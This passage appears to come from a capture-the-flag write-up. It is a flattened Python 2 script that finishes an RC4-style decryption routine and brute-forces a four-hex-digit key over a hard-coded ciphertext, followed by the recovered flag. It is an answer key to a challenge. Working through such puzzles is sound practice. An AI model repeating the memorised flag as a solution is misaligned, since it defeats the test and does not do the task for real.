j = (j + box[i] + rndkey[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
a = 0
j = 0
for i in range(string_length):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(string[i] ^ box[(box[a] + box[j]) % 256])
return result
if __name__ == '__main__':
d = [
128,
220,
109,
113,
242,
153,
181,
203,
21,
122,
2,
101,
42,
55,
56,
19,
190,
181,
99,
47,
217,
109,
129,
221,
9,
65,
235,
48,
197,
103,
123,
86,
25,
112,
172,
175,
42,
168,
232,
81,
224,
170,
16,
210,
98,
229,
15,
30,
134]
for x1 in '0123456789abcdef':
for x2 in '0123456789abcdef':
for x3 in '0123456789abcdef':
for x4 in '0123456789abcdef':
keyc=x1+x2+x3+x4
res = encodestr(d,keyc)
flagbool = 1
for i in res:
if ord(i)>128 or ord(i)<20:
flagbool=0
break
if flagbool:
print res
运行后得到1
flag{$h0w_m3_7he_m0ney}
